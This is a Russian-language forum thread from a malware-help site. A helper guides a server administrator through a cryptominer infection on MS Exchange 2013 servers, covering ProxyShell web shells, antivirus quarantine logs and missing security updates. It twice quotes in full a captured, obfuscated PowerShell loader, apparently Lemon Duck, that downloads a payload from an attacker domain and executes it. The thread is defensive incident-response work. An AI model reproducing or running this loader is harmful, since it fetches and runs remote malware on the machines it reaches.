[ Закрыто ] запуск майнера на серверах с MS Exchange 2013

RSS

Сообщений: 148

Баллов: 118

Регистрация: 25.03.2011

Размещено 26.07.2021 09:55:41

Здравствуйте.
Собственно снова вирусы на двух MS Exchange 2013. В скриншоте показал строку c бякой.
Файл WACS.EXE нормальный, используется для сертификатов ssl.
Помогите отыскать заразу.

Прикрепленные файлы

2021-07-26_09-29-04.png (82.73 КБ)

IZTVMAIL01_2021-07-26_09-39-43_v4.11.6.7z (738.73 КБ)

Ответы

Пред. 1 2 3 4 5

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 13.08.2021 05:45:21

возможен и такой вариант проникновения.

ProxyShell активно используется для установки веб-шеллов
В настоящее время эксплойт сбрасывает веб-оболочку размером 265 КБ в папку c: \ inetpub \ wwwroot \ aspnet_client \.
веб-оболочки состоят из простого защищенного аутентификацией сценария, который злоумышленники могут использовать для загрузки файлов на скомпрометированный сервер Microsoft Exchange.
злоумышленники используют первую веб-оболочку для загрузки дополнительной веб-оболочки в папку с удаленным доступом и два исполняемых файла в папки C: \ Windows \ System32
Если два исполняемых файла не могут быть найдены, в следующей папке будет создана другая веб-оболочка в виде файлов ASPX со случайным именем.
C: \ Program Files \ Microsoft \ Exchange Server \ V15 \ FrontEnd \ HttpProxy \ owa \ auth \
Злоумышленники используют вторую веб-оболочку для запуска исполняемого файла (пример: createhidetask.exe), который создает запланированную задачу с именем (например:PowerManager), которая запускает исполняемый файл (например:ApplicationUpdate.exe ) в 1 час ночи каждый день.
исполняемый файл ApplicationUpdate.exe - это пользовательский загрузчик .NET, используемый в качестве бэкдора.
«ApplicationUpdate.exe - это загрузчик .NET, который загружает другой двоичный файл .NET с удаленного сервера (который в настоящее время обслуживает полезную нагрузку)

https://www.bleepingcomputer.com/news/microsoft/hackers-now-backdoor-microsoft-exchange-using-proxyshell-exploits/

если смотреть по пред логам сканирования от мбам: (от 28.07)

Цитата
Backdoor.Hafnium.Shell, C:\USERS\M.KONDRATENKO\APPDATA\ROAMING\Microsoft\Windows\Recent\iisstart.aspx.lnk, Помещено в карантин, 16927, 926908, , , , , ED05CFED65BC2E502E951C135327EBB7, 76988CB834B065119A6960092FF61CAF7FA24DBC9F65E8EF469A2F6EB22F6597 Backdoor.Hafnium.Shell, C:\INETPUB\WWWROOT\ASPNET_CLIENT\SYSTEM_WEB\IISSTART.ASPX, Помещено в карантин, 16927, 926908, 1.0.43628, , ame, , 0D5FB80F2F6ABF8182E82DC680F8F4B8, E9AB861970DDC99D06914A71D089EBA4E42F3216AEA3A43E1FD551FBDF9A0E16

Цитата

Backdoor.Hafnium.Shell, C:\USERS\M.KONDRATENKO\APPDATA\ROAMING\Microsoft\Windows\Recent\iisstart.aspx.lnk, Помещено в карантин, 16927, 926908, , , , , ED05CFED65BC2E502E951C135327EBB7, 76988CB834B065119A6960092FF61CAF7FA24DBC9F65E8EF469A2F6EB22F6597
Backdoor.Hafnium.Shell, C:\INETPUB\WWWROOT\ASPNET_CLIENT\SYSTEM_WEB\IISSTART.ASPX, Помещено в карантин, 16927, 926908, 1.0.43628, , ame, , 0D5FB80F2F6ABF8182E82DC680F8F4B8, E9AB861970DDC99D06914A71D089EBA4E42F3216AEA3A43E1FD551FBDF9A0E16

Цитата
-Информация о веб-сайте- Категория: Троянская программа Домен: IP-адрес: 192.227.134.73 Порт: 443 Тип: Входящий трафик Файл: System

может, стоит еще раз проверить сканированием в мбам, что он найдет в этот раз, после новых запусков.

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 13.08.2021 09:25:41

что еще нужно проверить.

судя по списку установленного ПО, у вас версия 15.0.1497.2 кумулятивного обновления
Microsoft Exchange Server 2013 Cumulative Update 23
выпуск этого обновления был от
Exchange Server 2013 CU23 18 июня 2019 г. 15.0.1497.2 15.00.1497.002

после этого
Exchange Server 2013 CU23 18 июня 2019 г. 15.0.1497.2 15.00.1497.002
были еще новые выпуски:

Exchange Server 2013 CU23 Jul21SU 13 июля 2021 г. 15.0.1497.23 15.00.1497.023
Exchange Server 2013 CU23 May21SU 11 мая 2021 г. 15.0.1497.18 15.00.1497.018
Exchange Server 2013 CU23 Apr21SU 13 апреля 2021 г. 15.0.1497.15 15.00.1497.015
Exchange Server 2013 CU23 Mar21SU 2 марта 2021 г. 15.0.1497.12 15.00.1497.012

возможно,
некорректное отображение версии обновления в списке установленного ПО,
а возможно,
установлено неактуальное обновление для Microsoft Exchange Server 2013

https://docs.microsoft.com/ru-ru/exchange/new-features/build-numbers-and-release-dates

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 13.08.2021 10:56:20

Цитата
RP55 RP55 написал: + https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

здесь RP55, скорее прав,
что атака была и с этой стороны, судя по тому, что в одном из апрельских образов (на другом почт сервере), запускался такой скрипт.

Код
"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97asd123';$ifp=$env:tmp+'\m6.bin';$down_url='хттп://[B]d.hwqloan.com[/B]';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^\|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&VMCTFH-MAIL^^^&36780342-A764-974C-DAE2-ACFBD65CC3C0^^^&00:50:56:83:FF:5F');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^\|Get-Random -Count 100));test1 -PEBytes $bin\|CzdpTG6VH1.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe

Код

"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97asd123';$ifp=$env:tmp+'\m6.bin';$down_url='хттп://[B]d.hwqloan.com[/B]';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&VMCTFH-MAIL^^^&36780342-A764-974C-DAE2-ACFBD65CC3C0^^^&00:50:56:83:FF:5F');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|CzdpTG6VH1.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe

но там после уст патчей все затихло сразу. те данная атака прекратилась.

(хотя и не факт, что именно они сейчас запускают майнер)

[ Как создать образ автозапуска? ]

Сообщений: 148

Баллов: 118

Регистрация: 25.03.2011

Размещено 16.08.2021 10:39:14

Спасибо. Сейчас буду проверять всё что ниписали. Но с того момента как заблокировал всю хетслерскую сеть, так уже вторую неделю не видим проблем. Но проверять нужно.

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 21.08.2021 13:06:49

Цитата
Владимир Шариков написал: Спасибо. Сейчас буду проверять всё что ниписали. Но с того момента как заблокировал всю хетслерскую сеть, так уже вторую неделю не видим проблем. Но проверять нужно.

а по логам DNS можете проверить, были из внутренней сети попытки подключения на заблокированные адреса?

[ Как создать образ автозапуска? ]

Пред. 1 2 3 4 5